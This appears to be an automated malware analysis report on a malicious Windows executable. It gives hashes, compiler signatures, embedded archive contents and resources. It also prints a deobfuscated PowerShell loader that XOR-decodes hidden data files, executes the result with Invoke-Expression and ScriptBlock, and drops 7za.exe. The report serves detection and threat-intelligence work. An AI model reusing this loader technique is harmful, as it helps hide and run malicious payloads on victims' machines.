Malicious

6a53423827f43647cd5f0b23ab785f7e

PE Executable | MD5: 6a53423827f43647cd5f0b23ab785f7e | Size: 2.34 MB | application/x-dosexec

Characteristics
MD5: 6a53423827f43647cd5f0b23ab785f7e
Sha1: 701329d9ef8c36ef89e402d25ba1b76dcb2ff14b
Sha256: ff9fe19f2fe7148190131b48fc6e92a4a33569c990009edf87737e4cbe56cf29
Sha384: 8683c0c2f50e749fae11a0fbfc33c9d4fa48fdb2ba35d774bdf67937f262cd2313ade97f4aa44ba61316682d90807727
Sha512: 1975d00b2c9fa9d7023a432e2007235ee3c973fcc2194f545ffd3ffcde704941ef091347ec005ecfb666766b9805a1bb5d63239586b09dbf36688ffdd8a2837e
SSDeep: 49152:AgwRW3PSS0qm4ZqQn+NNozrP4Fw+JGTb1/t08EHBDlW:AgwR8k2dnAezAw+Ji1/rUZW
TLSH: BEB5331137E3CCF5F589663225919BA23D9BFB2103E653DF3BDC2A9208205C5D9F0A96

PeID

Microsoft Visual C++
Microsoft Visual C++ 5.0
Microsoft Visual C++ 6.0 DLL (Debug)
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
File Structure
7z-stream @ 0x000224A1.7z
Malicious
data1.bin
data2.bin
data3.bin
[Deobfuscated PS]
Malicious
Overlay_917df09d.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1033
ID:1033-preview.png
ID:0002
ID:1033
ID:0003
ID:1033
ID:0004
ID:1033
RT_GROUP_CURSOR4
ID:0001
ID:1033
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Information
Info: PE Detect: PeReader OK (file layout)
Info: Overlay extracted: Overlay_917df09d.bin (2202263 bytes)

Artefacts
Name
Value
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1]
function encode($data, [int] $key)
$step = ($key -Rem 10) + 1
$len = 0
return $data | ForEach-Object
$key = ($key -Rem 255) + 1
$_ -bxor $key
$key += $step
$len
if (Test-Path "data5.bin" -PathType "Leaf") {
    $binaryData = [File]::"ReadAllBytes"("data5.bin")
    $encodedData = encode -data $binaryData -key 12199
    Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData))
}
if (Test-Path "data.bin") {
    $binaryData = [File]::"ReadAllBytes"("data.bin")
    $encodedData = encode -data $binaryData -key 12199
    & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData)))
}
$binaryData = [File]::"ReadAllBytes"("data1.bin")
$encodedData = encode -data $binaryData -key 12199
[File]::"WriteAllBytes"("7za.exe", $encodedData)

Characteristics
No malware configuration was found at this point.
Malicious

6a53423827f43647cd5f0b23ab785f7e > 7z-stream @ 0x000224A1.7z > setup.cmd
